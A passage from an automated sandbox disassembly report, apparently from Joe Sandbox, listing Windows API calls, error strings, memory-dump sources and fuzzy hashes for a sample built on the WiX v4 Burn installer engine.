                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1341F376A40662BBD7218F1ACC49F6B7A68FF06B65F114215FE14EB280E3A1DC50D7E0

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0093A5AD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(SystemFunction041), ref: 0093A5C3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0093A624
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093A63C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0093A682
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093A69A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorLast$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$Failed to load Crypt32.dll$Failed to load a decryption method$Failed to load an encryption method$SystemFunction040$SystemFunction041$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1969025732-402918305
                                                                                                                                                                                                                                                                            • Opcode ID: b7ff12c65672c4048a8dfb5c9022f8538209c6bf73ef61a96aaaffcf1375b640
                                                                                                                                                                                                                                                                            • Instruction ID: f2eea32c2c25850ecfa9a7451424d8a20b0cf58de854e2957e569aacd6ce3db8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7ff12c65672c4048a8dfb5c9022f8538209c6bf73ef61a96aaaffcf1375b640
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2831B537A96321A7D3315B199C0FF163968BB51B99F058111FA4CBA2F1E3B49C80EF91

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(00000000,00000000,00000001,0000000C,00000000,?,00000000,00000000,0000000C,00000000,00000000,00000000,00000000,00958FA8,?,00000000), ref: 008E3FF5
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 008E4064
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E4071
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 008E4085
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E412A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to concatenate the temp folder and log prefix., xrefs: 008E3F85
                                                                                                                                                                                                                                                                            • failed to allocate memory for the temp path, xrefs: 008E4108
                                                                                                                                                                                                                                                                            • Failed to create temp file: %ls, xrefs: 008E40BD
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 008E3F3B, 008E3FC7, 008E4117
                                                                                                                                                                                                                                                                            • Failed to combine directory and log prefix., xrefs: 008E3F2C
                                                                                                                                                                                                                                                                            • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 008E4037
                                                                                                                                                                                                                                                                            • Failed to copy temp path to return., xrefs: 008E40E9
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008E412A
                                                                                                                                                                                                                                                                            • Failed to ensure temp file path exists: %ls, xrefs: 008E3FB8
                                                                                                                                                                                                                                                                            • Failed to get temp folder., xrefs: 008E3F5D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorFileHandleLastLocalSleepTime
                                                                                                                                                                                                                                                                            • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$Failed to combine directory and log prefix.$Failed to concatenate the temp folder and log prefix.$Failed to copy temp path to return.$Failed to create temp file: %ls$Failed to ensure temp file path exists: %ls$Failed to get temp folder.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp$failed to allocate memory for the temp path$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1968021109-2646403823
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0090E825
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE ref: 0090EACD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                            • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3442037557-242603754
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0097D4F0,00000000,00000000,00000001,0000000C,0000000C,?,008FA885,00000000,00000001,00958FA8,?,00000000,00000000,0000000C,00000000), ref: 0093B0F7
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0097D4F0,?,008FA885,00000000,00000001,00958FA8,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 0093B2F9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: @1Wu$Failed to combine the log path.$Failed to copy log path.$Failed to create log based on current system time.$Failed to ensure log file directory exists: %ls$Failed to expand the log path.$Failed to get log directory.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to create log file: %ls
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-3209006981
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,?,00000000,?,?,008EED4D,?,00000000,?,008EEE16), ref: 0090EEC9
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008EED4D,?,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 0090EED6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorEventLast
                                                                                                                                                                                                                                                                            • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp$wininet.dll
                                                                                                                                                                                                                                                                            • API String ID: 545576003-3725142438
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,008E7D5B,00000000,008E7DDB,?,?,008EB898,00000002,?,8D4BE800,00000000), ref: 008EA0E6
                                                                                                                                                                                                                                                                              • Part of subcall function 008E8306: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,008E9840,008E9840,?,008E8154,?,?,00000000), ref: 008E8342
                                                                                                                                                                                                                                                                              • Part of subcall function 008E8306: GetLastError.KERNEL32(?,008E8154,?,?,00000000,?,00000000,008E9840,?,008EB468,?,?,?,?,?), ref: 008E8371
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000,?,?,00000000,8D4BE800,00000000), ref: 008EA2AD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Setting hidden variable '%ls', xrefs: 008EA1C6
                                                                                                                                                                                                                                                                            • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 008EA2BF
                                                                                                                                                                                                                                                                            • Setting numeric variable '%ls' to value %lld, xrefs: 008EA209
                                                                                                                                                                                                                                                                            • Setting version variable '%ls' to value '%ls', xrefs: 008EA1F2
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA17D, 008EA29F
                                                                                                                                                                                                                                                                            • Failed to insert variable '%ls'., xrefs: 008EA12E
                                                                                                                                                                                                                                                                            • Setting %ls variable '%ls' to value '%ls', xrefs: 008EA233
                                                                                                                                                                                                                                                                            • Attempt to set built-in variable value: %ls, xrefs: 008EA188
                                                                                                                                                                                                                                                                            • formatted, xrefs: 008EA223
                                                                                                                                                                                                                                                                            • string, xrefs: 008EA22A, 008EA232
                                                                                                                                                                                                                                                                            • Unsetting variable '%ls', xrefs: 008EA242
                                                                                                                                                                                                                                                                            • Failed to find variable value '%ls'., xrefs: 008EA101
                                                                                                                                                                                                                                                                            • Failed to set value of variable: %ls, xrefs: 008EA28D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                                                                                                                            • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting %ls variable '%ls' to value '%ls'$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%ls'$Unsetting variable '%ls'$d:\a\wix4\wix4\src\burn\engine\variable.cpp$formatted$string
                                                                                                                                                                                                                                                                            • API String ID: 2716280545-2464245954
                                                                                                                                                                                                                                                                            • Opcode ID: 5ffcaf436b874aaed23c3cd4208fcb13d4ca81740f81353715399dfa8fd0cddd
                                                                                                                                                                                                                                                                            • Instruction ID: b56b894788b8ba546a1ca025945603fa4c9709e61a82452fe028ff53fa50c784
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ffcaf436b874aaed23c3cd4208fcb13d4ca81740f81353715399dfa8fd0cddd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A51C531640291BBDB399A57CC4AF673AA9FB93F15F100019FA05F61C1D2B2E940C6A3
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0,00000008,?,00000000,00000000,?,?), ref: 008FA749
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to copy log file path from command line., xrefs: 008FA63A
                                                                                                                                                                                                                                                                            • Failed to initialize logging., xrefs: 008FA660
                                                                                                                                                                                                                                                                            • log, xrefs: 008FA6F5
                                                                                                                                                                                                                                                                            • Failed to copy default log prefix., xrefs: 008FA6D3
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\logging.cpp, xrefs: 008FA64C, 008FA66F, 008FA7DA
                                                                                                                                                                                                                                                                            • Failed to get parent directory from '%ls'., xrefs: 008FA850
                                                                                                                                                                                                                                                                            • Failed to copy log path to prefix., xrefs: 008FA903
                                                                                                                                                                                                                                                                            • Failed to copy default log extension., xrefs: 008FA706
                                                                                                                                                                                                                                                                            • Failed to open log: %ls, xrefs: 008FA7C8
                                                                                                                                                                                                                                                                            • Failed to copy log extension to extension., xrefs: 008FA930
                                                                                                                                                                                                                                                                            • Failed to get non-session specific TEMP folder., xrefs: 008FA8A5
                                                                                                                                                                                                                                                                            • Failed to copy full log path to prefix., xrefs: 008FA95B
                                                                                                                                                                                                                                                                            • Setup, xrefs: 008FA6C2
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                            • String ID: Failed to copy default log extension.$Failed to copy default log prefix.$Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log file path from command line.$Failed to copy log path to prefix.$Failed to get non-session specific TEMP folder.$Failed to get parent directory from '%ls'.$Failed to initialize logging.$Failed to open log: %ls$Setup$d:\a\wix4\wix4\src\burn\engine\logging.cpp$log
                                                                                                                                                                                                                                                                            • API String ID: 3472027048-3437580743
                                                                                                                                                                                                                                                                            • Opcode ID: 993061878bc27cfe48cbeb093f313289845cdc6f8c3fc394caa63a3156eef2fc
                                                                                                                                                                                                                                                                            • Instruction ID: e81c462f4c48856bf0b7a6ef360d7e6f7861dacf65976a316327d7b9d27ce6a2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 993061878bc27cfe48cbeb093f313289845cdc6f8c3fc394caa63a3156eef2fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EB1F5B1A0031ABAEB299B75CC45F7777A8FF54724F144125FA08EB181E7B0DC408BA2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 0090DEB0
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0090DEC6
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0090DECF
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 0090DED6
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0090DEE0
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0090DF7F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0090DF8C
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                                                                                                                            • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3030546534-373254902
                                                                                                                                                                                                                                                                            • Opcode ID: 55192d8e83915de60b3c4aa153e41a1368e76503bc9a14696247032e5e61ccd9
                                                                                                                                                                                                                                                                            • Instruction ID: 479fd17c0921028cdefcbdefd0d10c5f7162d6d97139d25f2c1d1c76e7db1283
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55192d8e83915de60b3c4aa153e41a1368e76503bc9a14696247032e5e61ccd9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A831D576952621BBEB21AB998C4DF9F3E6DEF46B60F114150FE05BB2D0D7B09800D6A0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,00000000,008E6570,00000000,?,?,?,0094284A,00000000,?,008E6C5C,00000000), ref: 00942B11
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00000000,008E6570,00000000,?,?,?,0094284A,00000000,?,008E6C5C), ref: 00942B20
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeLibrary$ErrorLastLoadTask
                                                                                                                                                                                                                                                                            • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to find SHGetKnownFolderPath entry point.$Failed to get known folder path.$Failed to load shell32.dll.$SHGetKnownFolderPath$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp$shell32.dll
                                                                                                                                                                                                                                                                            • API String ID: 3444712580-2659096373
                                                                                                                                                                                                                                                                            • Opcode ID: 32a0ea28a56ebc705ed31a24028837f93230efea8eb65a57e3835c863838a277
                                                                                                                                                                                                                                                                            • Instruction ID: ea656c6146b70b95dd45a3201f634d28e36e5656a546eecdce81b26877c6c4ab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32a0ea28a56ebc705ed31a24028837f93230efea8eb65a57e3835c863838a277
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B431D572EC0224B7EB326B958C0EFAF6E69FB46B54F414151FE04BA1D2D7B08E40D591
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,00000000,00000000,?,?,009034D1,00000000,?), ref: 00902AF3
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,009034D1,00000000,?), ref: 00902AFD
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(00000000,?,?,009034D1,00000000,?), ref: 00902B04
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,009034D1,00000000,?), ref: 00902B0E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,009034D1,00000000,?), ref: 00902BAF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                                                                                                                                                            • String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$d:\a\wix4\wix4\src\burn\engine\core.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 4224961946-3799686971
                                                                                                                                                                                                                                                                            • Opcode ID: 8a024843d3d94718ffb00e3f336e00b2e66b39646ea7eabf9d51ba7801424dfe
                                                                                                                                                                                                                                                                            • Instruction ID: 6946eb6fcd775a5bd9bab27f72f9c9c097c31af87c1ab16fb1b3aaeda944003a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a024843d3d94718ffb00e3f336e00b2e66b39646ea7eabf9d51ba7801424dfe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB219875940315BBDB219BA99C0EF9E7B6CAF46765F100251BE20F71D0E2B09D109791
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(008E6570,00000008,00000000,008E6C5C,008E6C78,00000000,008E6570,00000000,?,?,?,?,?,?), ref: 0093B7B4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093B7BE
                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),00000004,00000004,?,?,?,?,?,?,?), ref: 0093B807
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093B820
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 0093B876
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to get elevation token from process.$Failed to open process token.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 4040495316-678089218
                                                                                                                                                                                                                                                                            • Opcode ID: 9693309cddb49cac11ccc852cfae74a8b5ab08b67a8ae504ea85b45928bd5eea
                                                                                                                                                                                                                                                                            • Instruction ID: 12152cb69801658410c9bba45188996721ab856a7ac159a991f5256bb3744e5f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9693309cddb49cac11ccc852cfae74a8b5ab08b67a8ae504ea85b45928bd5eea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14219476D41224BBD7219B599C4AFAEBAACEF41750F014055FF19BB290E3748E00DE91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(008E6C94,00000000,00000000,00000000,?,?,?,008E7B5B,?,?,00000000,?,?,00000003,00000000,008E6570), ref: 008E67AF
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(008E6C28,?,?,?,008E7B5B,?,?,00000000,?,?,00000003,00000000,008E6570,00000000), ref: 008E67BC
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(008E663C,?,?,?,008E7B5B,?,?,00000000,?,?,00000003,00000000,008E6570,00000000), ref: 008E67D3
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(008E6CEC,008E6C78,008E6C5C,?,?,?,008E7B5B,?,?,00000000,?,?,00000003,00000000,008E6570,00000000), ref: 008E67F8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B796: OpenProcessToken.ADVAPI32(008E6570,00000008,00000000,008E6C5C,008E6C78,00000000,008E6570,00000000,?,?,?,?,?,?), ref: 0093B7B4
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B796: GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093B7BE
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B796: CloseHandle.KERNELBASE(00000000), ref: 0093B876
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,0095E414,000000FF,008E6C5C,008E6C78,008E6570,?,00000000,?), ref: 0090470C
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 0090472F
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00904752
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E458,000000FF), ref: 00904775
                                                                                                                                                                                                                                                                              • Part of subcall function 0090469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E45C,000000FF), ref: 00904798
